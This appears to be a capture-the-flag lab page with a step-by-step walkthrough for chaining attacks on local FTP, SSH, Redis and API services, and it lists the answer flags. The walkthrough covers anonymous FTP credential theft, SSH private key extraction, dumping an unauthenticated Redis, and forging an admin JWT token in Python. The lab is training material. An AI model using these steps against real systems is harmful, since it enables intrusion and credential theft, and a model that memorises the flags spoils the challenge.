FTP Service
Port 2121 • Anonymous Login Enabled
SSH Service
Port 2222 • Key Authentication
Redis Database
Port 6379 • No Authentication
API Gateway
Port 8080 • JWT Authentication
Flag Submission
Submit flags discovered through REAL exploitation. Each service contains one flag.
Format: FLAG{service-name-description}
Captured Flags
No flags captured yet. Start with FTP service exploitation!
Exploitation Guide
Step 1: Reconnaissance
nmap -sV -p 2121,2222,6379,8080 localhost
Discover open ports and service versions on the target.
Step 2: FTP Exploitation
# Connect with anonymous login
ftp localhost 2121
Username: anonymous
Password: [press Enter]
# List files and download hidden credentials
ls -la
get .hidden_creds.txt
cat .hidden_creds.txt
Use anonymous login to access FTP server and download hidden credentials file.
Step 3: SSH Key Extraction
# Extract SSH key from downloaded file
cat .hidden_creds.txt | grep -A 50 "PRIVATE KEY" > ssh_key.b64
base64 -d ssh_key.b64 > ssh_key.pem
chmod 600 ssh_key.pem
# Connect via SSH
ssh -i ssh_key.pem -p 2222 admin_zt@localhost
Extract base64-encoded SSH private key from FTP file and connect to SSH service.
Step 4: Redis Enumeration
# Connect to Redis without authentication
redis-cli -h localhost -p 6379
# Enumerate keys and extract data
KEYS *
GET zt:flag:redis
GET zt:api:jwt_secret
Access Redis database without authentication to extract JWT secret and flag.
Step 5: JWT Token Forgery
# Use Python to forge admin JWT token
python3 -c "
import jwt
import time
secret = 'SuperSecretJWTKeyForZTAPI2026'
payload = {
'user': 'admin_007',
'role': 'admin', # Changed from 'user'
'iat': int(time.time())
}
token = jwt.encode(payload, secret, algorithm='HS256')
print(f'Token: {token}')
"
Use extracted JWT secret to forge admin authentication token by changing role to admin.
Step 6: Admin API Access
# Access admin endpoint with forged token
curl -H "Authorization: Bearer YOUR_FORGED_TOKEN" \
http://localhost:8080/api/v1/admin/flag
Use forged token to access admin endpoint and retrieve final flag.
Challenge Objectives
-
Capture FTP flag:
FLAG{ZT-FTP-4n0n_L0g1n_H1dd3n_Cr3d5} -
Capture SSH flag:
FLAG{ZT-SSH-W34k_K3y_Fr0m_FTP} -
Capture Redis flag:
FLAG{ZT-REDIS-N0_Auth_Lua_Leak} -
Capture API flag:
FLAG{ZT-API-JWT_S3cr3t_F0rg3ry} - Chain all vulnerabilities to compromise all services